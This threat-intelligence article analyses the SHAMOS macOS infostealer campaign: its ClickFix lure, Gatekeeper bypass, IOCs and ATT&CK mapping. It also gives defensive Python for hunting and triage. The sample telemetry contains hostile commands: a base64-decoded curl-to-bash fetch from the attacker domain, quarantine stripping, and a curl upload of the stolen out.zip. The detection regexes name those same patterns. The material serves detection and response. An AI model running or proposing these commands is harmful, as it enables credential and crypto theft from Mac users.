SHAMOS macOS Malware Explained: The Infostealer You Can’t Ignore

Introduction

Between June and August 2025, a criminal crew CrowdStrike tracks as COOKIE SPIDER ran a global malvertising operation that pushed SHAMOS, a variant of Atomic macOS Stealer (AMOS), to Mac users. Ads and fake “Mac help” pages (and a spoofed GitHub repo) told victims to paste a single Terminal command (“ClickFix” style) that silently fetched a Bash installer, stripped the quarantine attribute so Gatekeeper never assessed the download, dropped a Mach-O payload in /tmp/, and raided browsers, Keychain, Apple Notes, and crypto wallets before exfiltrating a zipped bundle via curl.

CrowdStrike reports attempted delivery in 300+ customer environments; the campaign avoided Russia and the CIS, consistent with the rules of the e-crime forums where such services are sold.

Threat actor & campaign profile

Attribution. SHAMOS is operated within COOKIE SPIDER’s malware-as-a-service (MaaS) business built around AMOS. The crew monetizes by renting the stealer and by converting stolen credentials and crypto.

Distribution & lures. Users searching for fixes like “macOS flush DNS cache” were shown paid search ads for cloned “help” sites (examples observed: mac-safer[.]com, rescue-mac[.]com) or a fake GitHub repo posing as iTerm2. Those pages instructed victims to paste a one-liner into Terminal, the hallmark of a ClickFix attack.

Victimology & scope. CrowdStrike saw attempted delivery in 300+ customer environments across the U.S., UK, Japan, China, Colombia, Canada, Mexico, Italy and more; no Russian targets were observed.

Technical analysis

Initial access (ClickFix one-liner)

  • Fake help/GitHub pages present a single command. In observed cases it Base64-decodes a URL and pulls a Bash script from attacker infrastructure (e.g., icloudservers[.]com/gm/install.sh).
  • This pattern aligns with broader ClickFix social engineering: lure → copy/paste command → user-assisted execution. (Microsoft and others have warned ClickFix surged in 2025.)
Source: CrowdStrike

Installation

The script:

  • Prompts the victim for their macOS password (a sudo-style prompt) and captures it.
  • Downloads the SHAMOS Mach-O to /tmp/, removes the com.apple.quarantine attribute with xattr (so Gatekeeper never assesses the file), marks it executable with chmod +x, and runs it.

Defense evasion & runtime behavior

  • Anti-VM/sandbox checks before proceeding.
  • AppleScript-driven host recon and file collection.
  • Collection targets confirmed: browser data (passwords/cookies/auto-fills), Keychain items, Apple Notes, and crypto-wallet artifacts.

Exfiltration

  • Data staged into out.zip and sent via curl to actor-controlled endpoints.

Persistence & follow-on payloads

  • On systems where the installer gains elevated privileges, it writes a LaunchDaemon, /Library/LaunchDaemons/com.finder.helper.plist, for persistence (LaunchDaemons run as root at boot, which is why the elevated context is required).
  • Observed secondary payloads include a spoofed Ledger Live wallet app and a botnet module.

Infrastructure & IOCs (selected)

  • Malvertising/landing domains: mac-safer[.]com, rescue-mac[.]com
  • Downloader hosts: icloudservers[.]com, macostutorial[.]com
  • GitHub decoy: github[.]com/jeryrymoore/Iterm2
  • Local artifacts: /tmp/<random> Mach-O, out.zip, /Library/LaunchDaemons/com.finder.helper.plist

Who was hit?

Public sources have not named specific organizations. What we do know is:

  • The scale (300+ attempted environments) and breadth of geography are confirmed.
  • Lures imitated generic Mac troubleshooting and popular software categories (video editing, CAD, “performance tools,” AI/dictation), indicating broad, opportunistic targeting rather than a single vertical. (Inference based on CrowdStrike’s observed decoys.)

Political & economic impact

Economic

  • Direct losses: crypto theft and account takeovers from stolen Keychain/browser data.
  • Indirect losses: business email/session hijacking, downstream breaches, incident response costs, password resets, and ad-fraud exposure if ad/marketing accounts are compromised. These follow directly from the data types SHAMOS steals and match typical infostealer outcomes.

Political / policy

Platform trust: Bypassing Gatekeeper via user-paste commands challenges perceptions of macOS security and may spur OS-level guardrails against risky one-liners. (Supported by multiple outlets summarizing the bypass method.)

Ad ecosystem abuse: The campaign leveraged paid search ads and spoofed business profiles, fueling calls for stronger advertising vetting and anti-malvertising controls.

Technique normalization: ClickFix is now used by both e-crime and some APT actors, blurring crime/state TTPs and complicating attribution at scale.

MITRE ATT&CK mapping (high level)

  • Initial Access: T1189 (Drive-by Compromise, via malvertising), T1204 (User Execution: the victim pastes and runs the malicious command)
  • Execution: T1059 (Command and Scripting Interpreter), T1059.004 (Unix Shell: the Bash installer), T1059.002 (AppleScript)
  • Defense Evasion: T1553.001 (Subvert Trust Controls: Gatekeeper Bypass, via xattr quarantine removal), T1497 (Virtualization/Sandbox Evasion, the anti-VM checks)
  • Credential Access / Collection: T1555.001 (Credentials from Password Stores: Keychain), T1555.003 (Credentials from Web Browsers), T1539 (Steal Web Session Cookie), T1005 (Data from Local System: Notes and wallet files)
  • Exfiltration: T1560.001 (Archive Collected Data: Archive via Utility, the zip step) then T1041 (Exfiltration Over C2 Channel) using curl
  • Persistence: T1543.004 (Create or Modify System Process: Launch Daemon)

Detection & hunting ideas (macOS)

Tailor paths and tooling to your EDR/SIEM.

Command-line signals

  • Terminal/bash/zsh history containing base64 -d (or -D / --decode), curl ... | bash, or one-liners fetching install.sh from icloudservers[.]com or macostutorial[.]com.
  • xattr -d com.apple.quarantine followed by chmod +x on a file under /tmp/.
  • AppleScript/osascript invocations enumerating files/keystores.

Filesystem & artifacts

  • Presence of /tmp/<random> Mach-O executed recently.
  • /Library/LaunchDaemons/com.finder.helper.plist (or a similarly named item in /Library/LaunchAgents or ~/Library/LaunchAgents) with a recent launchctl load/bootstrap.
  • Recent creation of out.zip under user directories or /tmp/.

Network

  • DNS/HTTP(S) to mac-safer[.]com, rescue-mac[.]com, icloudservers[.]com, macostutorial[.]com around the time a user reported “copy/pasting a fix.”
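As an added example (not CrowdStrike's or the article's code), here are the hunting signals above turned into a rule that runs over process-execution telemetry and correlates the stages per user. The event fields (ts, user, pid, ppid, cmdline), the stage names, the 30-minute window and every event in SAMPLE_EVENTS are constructed for this example; the only page-derived values are the IOC domains and the out.zip / LaunchDaemon artifacts.

```python
"""Correlate SHAMOS/ClickFix stages across process-execution telemetry.

Added example, not from CrowdStrike's report or the original article. Input is
a list of process events as an EDR or a normalised unified-log export would
provide; the field names (ts, user, pid, ppid, cmdline) and every event in
SAMPLE_EVENTS are constructed for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One regex per stage of the chain described in the article.
STAGES = [
    ("clickfix_decode",  re.compile(r"base64\s+(-d|-D|--decode)\b.*\|\s*(ba)?sh\b")),
    ("curl_pipe_shell",  re.compile(r"\bcurl\b[^|]*\|\s*(ba)?sh\b|\b(ba)?sh\s+-c\s+[\"']?\$\(\s*curl\b")),
    ("ioc_domain",       re.compile(r"icloudservers\.com|macostutorial\.com|mac-safer\.com|rescue-mac\.com")),
    ("quarantine_strip", re.compile(r"\bxattr\b.*(-d\s+com\.apple\.quarantine|-c\b)")),
    ("chmod_tmp",        re.compile(r"\bchmod\s+\S+\s+/(private/)?tmp/")),
    ("tmp_exec",         re.compile(r"^/(private/)?tmp/\S+")),
    ("osascript",        re.compile(r"\bosascript\b")),
    ("stage_zip",        re.compile(r"\bzip\b.*\bout\.zip\b")),
    ("curl_upload",      re.compile(r"\bcurl\b.*(-F|--form|-T|--upload-file|--data-binary)\b.*out\.zip")),
    ("launchdaemon",     re.compile(r"\blaunchctl\s+(load|bootstrap)\b.*/Library/Launch(Daemons|Agents)/")),
]
ACCESS = {"clickfix_decode", "curl_pipe_shell", "ioc_domain"}
DEPLOY = {"quarantine_strip", "chmod_tmp", "tmp_exec"}
POST = {"osascript", "stage_zip", "curl_upload", "launchdaemon"}


def classify(cmdline):
    """Names of every stage whose pattern matches this command line."""
    return {name for name, rx in STAGES if rx.search(cmdline)}


def severity(stages):
    """high: signals from two or more phases; medium: two+ signals in one phase; low: a single signal."""
    phases = sum(1 for group in (ACCESS, DEPLOY, POST) if stages & group)
    return "high" if phases >= 2 else "medium" if len(stages) >= 2 else "low"


def _summarise(user, cluster):
    stages = set().union(*(s for _, s, _ in cluster))
    return {
        "user": user,
        "first_seen": cluster[0][0].isoformat(),
        "last_seen": cluster[-1][0].isoformat(),
        "stages": stages,
        "severity": severity(stages),
        "evidence": [(ev["pid"], sorted(s), ev["cmdline"]) for _, s, ev in cluster],
    }


def hunt(events, window=timedelta(minutes=30)):
    """Group matching events per user into clusters; a gap longer than `window` starts a new cluster."""
    by_user = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        stages = classify(ev["cmdline"])
        if stages:
            by_user[ev["user"]].append((datetime.fromisoformat(ev["ts"]), stages, ev))
    alerts = []
    for user, hits in by_user.items():
        cluster = []
        for ts, stages, ev in hits:
            if cluster and ts - cluster[-1][0] > window:
                alerts.append(_summarise(user, cluster))
                cluster = []
            cluster.append((ts, stages, ev))
        alerts.append(_summarise(user, cluster))
    return alerts


SAMPLE_EVENTS = [  # constructed telemetry; the first base64 blob decodes to the downloader URL from the IOC list
    {"ts": "2025-07-14T09:12:01", "user": "alice", "pid": 4101, "ppid": 4100,
     "cmdline": 'sh -c "echo aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo | base64 -d | xargs curl -fsSL | bash"'},
    {"ts": "2025-07-14T09:12:03", "user": "alice", "pid": 4103, "ppid": 4101,
     "cmdline": "curl -fsSL https://icloudservers.com/gm/install.sh"},
    {"ts": "2025-07-14T09:12:09", "user": "alice", "pid": 4110, "ppid": 4104,
     "cmdline": "xattr -d com.apple.quarantine /tmp/update"},
    {"ts": "2025-07-14T09:12:09", "user": "alice", "pid": 4111, "ppid": 4104, "cmdline": "chmod +x /tmp/update"},
    {"ts": "2025-07-14T09:12:10", "user": "alice", "pid": 4112, "ppid": 4104, "cmdline": "/tmp/update"},
    {"ts": "2025-07-14T09:12:15", "user": "alice", "pid": 4120, "ppid": 4112,
     "cmdline": "osascript -e 'tell application \"System Events\" to get name of every process'"},
    {"ts": "2025-07-14T09:13:40", "user": "alice", "pid": 4131, "ppid": 4112,
     "cmdline": "zip -r /tmp/out.zip /Users/alice/Library/Keychains /Users/alice/Library/Application Support/Google/Chrome/Default"},
    {"ts": "2025-07-14T09:13:42", "user": "alice", "pid": 4132, "ppid": 4112,
     "cmdline": "curl -s -X POST -F file=@/tmp/out.zip http://203.0.113.10/upload"},
    {"ts": "2025-07-14T09:30:00", "user": "bob", "pid": 5201, "ppid": 5200,
     "cmdline": "xattr -d com.apple.quarantine /Applications/Slack.app"},   # admin un-quarantining an app
    {"ts": "2025-07-14T11:00:00", "user": "carol", "pid": 6301, "ppid": 6300,
     "cmdline": 'bash -c "echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ= | base64 -d | xargs curl -s | sh"'},
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_EVENTS):
        print(alert["severity"].upper(), alert["user"], alert["first_seen"], sorted(alert["stages"]))
```

Severity is driven by phase coverage rather than raw match count: a lone xattr -d com.apple.quarantine (bob) stays low, a ClickFix one-liner with no follow-on activity (carol) is medium, and the full fetch, strip, execute, collect, exfiltrate chain (alice) is high. Feed it your EDR export and tune the window and the IOC list to your environment.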

Prevention & hardening (what to do now)

For security teams (enterprise & SMB)

Block risky one-liners by policy

  • Add controls in MDM/EDR to alert on/contain Terminal one-liners that fetch from the internet (e.g., curl … | bash, bash -c "$(curl …)", base64 -d | bash).

Tighten Gatekeeper/Quarantine flows

  • Monitor and alert on xattr -d com.apple.quarantine outside approved installers.

DNS & web filtering

  • Enforce safe search/ad filters; block or closely inspect sponsored results; sinkhole known SHAMOS IOCs.

EDR coverage

  • Ensure behavior rules catch AppleScript reconnaissance, zip + curl exfil, and LaunchDaemon creation. CrowdStrike and others document detections for this chain.

Least privilege

  • Do not give everyday user accounts admin rights (and therefore sudo); the LaunchDaemon persistence was only written when the installer ran with elevated privileges.

Developer tooling controls

  • Curate approved GitHub/orgs and Homebrew taps; flag clones/unknown repos, since a fake iTerm2 repo was abused.

User education (just-in-time)

  • Teach “never paste commands you don’t understand.” Add in-terminal banners or MDM pop-ups reminding users to route fixes through IT.

For individual Mac users & small teams

  • Do not paste Terminal fixes from search results or random GitHub gists.
  • Go to official docs (Apple Support/communities) or your IT team for troubleshooting.
  • Install from App Store or signed developers you know; keep macOS updated.
  • Use a reputable endpoint tool that inspects scripts and blocks known IOCs.

Incident response playbook (SHAMOS-suspected)

Isolate the Mac (disconnect every network interface, including Wi-Fi).

Acquire volatile data (process list, network connections) and preserve /tmp/, LaunchDaemons, and shell histories.

Hunt & contain

  • Remove suspicious LaunchDaemons (e.g., com.finder.helper.plist) and binaries in /tmp/.
  • Block the domains/IPs listed above at DNS and proxy; search for out.zip creation.
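As an added example (not CrowdStrike's or the article's tooling), a triage script that covers the acquire and hunt steps above on a live Mac (root "/") or the mount point of an acquired image. It looks for recently modified executable Mach-O files in /tmp, launch daemons/agents whose program lives in a temp or user-writable path, staged out.zip bundles, and ClickFix-style commands in shell histories. build_fixture() creates a constructed directory tree so the checks can be exercised offline; the file contents in it are placeholders, not a malware sample, and the seven-day lookback is an assumption.

```python
"""Triage a macOS root (live "/" or a mounted image) for the SHAMOS artifacts the article lists.

Added example, not CrowdStrike's or the article's tooling. build_fixture() creates a
constructed tree so the checks run offline; nothing in it is a real sample.
"""
import os
import plistlib
import re
import stat
import tempfile
from datetime import datetime, timedelta

MACHO_MAGICS = {b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe", b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
                b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca"}  # 32/64-bit and fat; 0xCAFEBABE is also Java .class
UNTRUSTED_PROGRAM_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/", "/Users/")
HISTORY_PATTERNS = [re.compile(p) for p in (r"base64\s+(-d|-D|--decode)", r"\bcurl\b.*\|\s*(ba)?sh\b",
                                            r"xattr\s+(-d\s+com\.apple\.quarantine|-c\b)")]


def is_macho(path):
    try:
        with open(path, "rb") as f:
            return f.read(4) in MACHO_MAGICS
    except OSError:
        return False


def _recent(path, since):
    return datetime.fromtimestamp(os.lstat(path).st_mtime) > since


def find_tmp_macho(root, since):
    """Recently modified executable Mach-O files under /tmp and /private/tmp."""
    hits = []
    for sub in ("tmp", "private/tmp"):
        for dirpath, _, files in os.walk(os.path.join(root, sub)):
            for p in (os.path.join(dirpath, n) for n in files):
                st = os.lstat(p)
                if stat.S_ISREG(st.st_mode) and st.st_mode & 0o111 and _recent(p, since) and is_macho(p):
                    hits.append(p)
    return sorted(hits)


def find_suspicious_launch_items(root):
    """Launch daemons/agents whose program lives in a temp, cache or user-writable path."""
    users = os.path.join(root, "Users")
    dirs = [os.path.join(root, d) for d in ("Library/LaunchDaemons", "Library/LaunchAgents")]
    dirs += [os.path.join(users, u, "Library/LaunchAgents") for u in (os.listdir(users) if os.path.isdir(users) else [])]
    findings = []
    for d in filter(os.path.isdir, dirs):
        for name in (n for n in os.listdir(d) if n.endswith(".plist")):
            p = os.path.join(d, name)
            try:
                with open(p, "rb") as f:
                    pl = plistlib.load(f)
            except Exception:
                findings.append({"plist": p, "label": None, "program": None, "reason": "unparseable"})
                continue
            program = pl.get("Program") or (pl.get("ProgramArguments") or [""])[0]
            if program.startswith(UNTRUSTED_PROGRAM_PREFIXES):
                findings.append({"plist": p, "label": pl.get("Label"), "program": program, "reason": "untrusted program path"})
    return findings


def find_staged_archives(root, since):
    """out.zip files (the exfil bundle) recently written under /tmp or a user home."""
    return sorted(os.path.join(dp, n) for sub in ("tmp", "private/tmp", "Users")
                  for dp, _, fs in os.walk(os.path.join(root, sub)) for n in fs
                  if n == "out.zip" and _recent(os.path.join(dp, n), since))


def grep_shell_histories(root):
    """(path, line number, command) for ClickFix-style commands in bash/zsh histories."""
    hits, users = [], os.path.join(root, "Users")
    for u in (os.listdir(users) if os.path.isdir(users) else []):
        for hist in (".bash_history", ".zsh_history"):
            p = os.path.join(users, u, hist)
            if os.path.isfile(p):
                with open(p, errors="replace") as f:
                    for n, line in enumerate(f, 1):
                        cmd = line.split(";", 1)[1] if line.startswith(": ") else line  # zsh EXTENDED_HISTORY prefix
                        if any(rx.search(cmd) for rx in HISTORY_PATTERNS):
                            hits.append((p, n, cmd.strip()))
    return hits


def triage(root="/", lookback=timedelta(days=7)):
    since = datetime.now() - lookback
    return {"tmp_macho": find_tmp_macho(root, since),
            "launch_items": find_suspicious_launch_items(root),
            "archives": find_staged_archives(root, since),
            "history_hits": grep_shell_histories(root)}


def build_fixture():
    """Constructed directory tree mimicking the artifacts; returns its root."""
    root = tempfile.mkdtemp(prefix="shamos-triage-")

    def put(rel, data, mode=0o644):
        p = os.path.join(root, rel)
        os.makedirs(os.path.dirname(p), exist_ok=True)
        with open(p, "wb") as f:
            f.write(data)
        os.chmod(p, mode)

    put("tmp/update", b"\xcf\xfa\xed\xfe" + b"\x00" * 60, 0o755)      # 64-bit Mach-O magic only, no real code
    put("tmp/notes.txt", b"plain text", 0o755)                            # executable bit but not Mach-O
    put("Library/LaunchDaemons/com.finder.helper.plist",
        plistlib.dumps({"Label": "com.finder.helper", "ProgramArguments": ["/tmp/update"], "RunAtLoad": True}))
    put("Library/LaunchDaemons/com.example.backup.plist",
        plistlib.dumps({"Label": "com.example.backup", "ProgramArguments": ["/usr/local/bin/backup"]}))
    put("Users/alice/out.zip", b"PK\x03\x04" + b"\x00" * 16)
    put("Users/alice/.zsh_history", b": 1752484321:0;ls -la\n"
        b": 1752484330:0;echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQ= | base64 -d | xargs curl -s | bash\n")
    return root


if __name__ == "__main__":
    import json
    import sys
    print(json.dumps(triage(sys.argv[1] if len(sys.argv) > 1 else build_fixture()), indent=2))
```

The launch-item check is deliberately a heuristic: legitimate agents whose program sits under /Users/... are flagged for review as well, which is what you want during triage. Run it before removing anything so the findings (paths, labels, history lines) are on record.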

Credential reset & session hygiene

  • Rotate Keychain, browser-stored passwords, Apple ID, corporate SSO; invalidate sessions/cookies (force logouts); treat crypto wallets/seeds as compromised.

Forensics to determine persistence and any follow-on payloads (e.g., fake Ledger app, botnet module).

Report malvertising placements to your ad vendor and share telemetry with your ISAC.

Why SHAMOS matters

  • It industrializes a reliable social technique (ClickFix) against macOS.
  • It bypasses Gatekeeper by design rather than through a vulnerability: a command the user pastes can strip the quarantine attribute before the payload ever runs.
  • It pairs credential/crypto theft with the ability to drop more malware, elevating both immediate financial risk and long-tail business compromise.

References

Most-relevant technical primary source:

  • CrowdStrike’s engineering & intel write-up with commands, infra, and geography.
